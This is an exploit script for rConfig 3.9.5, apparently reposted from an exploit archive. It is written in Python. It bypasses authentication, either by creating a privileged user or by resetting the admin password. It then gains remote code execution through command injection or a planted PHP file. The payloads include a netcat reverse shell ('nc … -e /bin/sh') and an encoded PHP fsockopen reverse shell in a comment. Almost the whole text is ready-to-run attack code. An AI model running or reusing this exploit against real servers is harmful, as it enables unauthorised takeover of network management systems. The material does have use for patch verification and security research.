rconfig 3.9.5 remote code execution (unauthenticated)

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rconfig 3.9.5 remote code execution (unauthenticated) Code Code...
# Exploit Title: rConfig 3.9.5 - Remote Code Execution (Unauthenticated) # Google Dork: N/A # Date: 2020-10-13 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: https://www.rconfig.com/ # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.5.zip # Version: rConfig v3.9.5 # Tested on: CentOS 7 x64 # CVE : N/A import requests from requests_toolbelt.multipart.encoder import MultipartEncoder import urllib3 import re #from bs4 import BeautifulSoup urllib3.disable_warnings() url="https://x.x.x.x/" #change this to fit your URL (adding the last slash) payload="nc y.y.y.y 9001 -e /bin/sh" #change this to whatever payload you want payload_rce= "fileName=../www/test.php&code=<%3fphp+echo+system('ls')%3b%3f>&id=3" #if you want to use Method 2 for RCE, use a PHP, urlencoded payload as the value of the code parameter print("Connecting to: {}".format(url)) print("Connect back is set to: {}, please launch 'nc -lv 9001'".format(payload)) x = requests.get(url+"login.php", verify=False) version = re.search("<p>(.*)<span>", x.text) version = version.group(1) if version == "rConfig Version 3.9.5": print("Version 3.9.5 confirmed") else: print("Version is "+version+ " it may not be vulnerable") payload_final=";"+payload referer=url+"useradmin.php" origin=url proxies = {"http": "", "https": ""} #in case you need to debug the exploit with Burp, add ', proxies=proxies' to any request def createuser(): multipart_data = MultipartEncoder( fields={ 'username': 'test', 'password': 'Testing1@', #password should have a capital letter, lowercase, number and a symbol 'passconf': 'Testing1@', 'email': 'test@test.com', 'ulevelid': '9', 'add': 'add', 'editid': '' } ) headers = {'Content-Type': multipart_data.content_type, "Upgrade-Insecure-Requests": "1", "Referer": referer, "Origin":origin} cookies = {'PHPSESSID': 'test'} response = requests.post(url+'lib/crud/userprocess.php', data=multipart_data, verify=False, cookies=cookies, headers=headers, allow_redirects=False) if "error" not in response.text: print("(+) User test created") else: print("(-) User couldn't be created, please debug the exploit") def exploit(): payload = { 'user': 'test', 'pass': 'Testing1@', 'sublogin': '1' } with requests.Session() as s: p = s.post(url+'lib/crud/userprocess.php', data=payload, verify=False) if "Stephen Stack" in p.text: print("(-) Exploit failed, could not login as user test") else: print("(+) Log in as test completed") params = {'path':'test', 'ext': payload_final } rce=s.get(url+'lib/ajaxHandlers/ajaxArchiveFiles.php', verify=False, params=params) if "success" in rce.text: print("(+) Payload executed successfully") else: print("(-) Error when executing payload, please debug the exploit") #if you used method 2 to auth bypass and 1 for RCE, ignore this message payload = { 'user': 'admin', 'pass': 'Testing1@', 'sublogin': '1' } with requests.Session() as s: p = s.post(url+'lib/crud/userprocess.php', data=payload, verify=False) if "Stephen Stack" in p.text: print("(-) Exploit failed, could not login as user test") else: print("(+) Log in as test completed") params = {'path':'test', 'ext': payload_final } rce=s.get(url+'lib/ajaxHandlers/ajaxArchiveFiles.php', verify=False, params=params) if "success" in rce.text: print("(+) Payload executed successfully") else: print("(-) Error when executing payload, please debug the exploit") def user_enum_update(): users=requests.get(url+'useradmin.inc.php', verify=False) #matchObj = re.findall(r'<td align="center">(.*?)</td>', users.text, re.M|re.I|re.S) if "admin" in users.text: print("(+) The admin user is present in this rConfig instance") multipart_data = MultipartEncoder( fields={ 'username': 'admin', 'password': 'Testing1@', #password should have a capital letter, lowercase, number and a symbol 'passconf': 'Testing1@', 'email': 'admin@admin.com', 'ulevelid': '9', 'add': 'add', 'editid': '1' #you may need to increment this if you want to reset the password of a different user } ) headers = {'Content-Type': multipart_data.content_type, "Upgrade-Insecure-Requests": "1", "Referer": referer, "Origin":origin} cookies = {'PHPSESSID': 'test'} response = requests.post(url+'lib/crud/userprocess.php', data=multipart_data, verify=False, cookies=cookies, headers=headers, allow_redirects=False) if "error" not in response.text: print("(+) The new password for the admin user is Testing1@") else: print("(-) Admin user couldn't be edited, please debug the exploit") elif "Admin" in users.text: print("(+) There is at least one Admin user, check "+ str(url)+"useradmin.inc.php manually and modify the exploit accordingly (erase the if-elif statements of this function and modify the user payload)") def template(): payload = { 'user': 'admin', 'pass': 'Testing1@', 'sublogin': '1' } #<%3fphp+%24sock%3Dfsockopen%28%22192.168.1.13%22%2C1234%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%3f> headers_rce = {'Content-Type': "application/x-www-form-urlencoded; charset=UTF-8", "Referer": url+"deviceConnTemplates.php", "Origin":origin, "X-Requested-With": "XMLHttpRequest", "Accept-Language": "en-US,en;q=0.5"} with requests.Session() as s: p = s.post(url+'lib/crud/userprocess.php', data=payload, verify=False) if "Stephen Stack" in p.text: print("(-) Exploit failed, could not login as user test") else: print("(+) Log in as admin completed") rce=s.post(url+'lib/ajaxHandlers/ajaxEditTemplate.php', verify=False, data=payload_rce, headers=headers_rce) if "success" in rce.text: print("(+) File created") rce_req = s.get(url+'test.php.yml', verify=False) print("(+) Command results: ") print(rce_req.text) else: print("(-) Error when executing payload, please debug the exploit") def main(): print("Remote Code Execution + Auth bypass rConfig 3.9.5 by Daniel Monzón") print("In the last stage if your payload is a reverse shell, the exploit may not launch the success message, but check your netcat ;)") print("Note: preferred method for auth bypass is 1, because it is less 'invasive'") print("Note2: preferred method for RCE is 2, as it does not need you to know if, for example, netcat has been installed in the target machine") print('''Choose method for authentication bypass: 1) User creation 2) User enumeration + User edit ''') auth_bypass=str(input("Method>")) if auth_bypass == "1": createuser() elif auth_bypass == "2": user_enum_update() print('''Choose method for RCE: 1) Unsafe call to exec() 2) Template edit ''') rce_method=str(input("Method>")) if rce_method == "1": exploit() elif rce_method == "2": template() main()

Rconfig 3.9.5 remote code execution (unauthenticated) Vulnerability / Exploit Source : Rconfig 3.9.5 remote code execution (unauthenticated)

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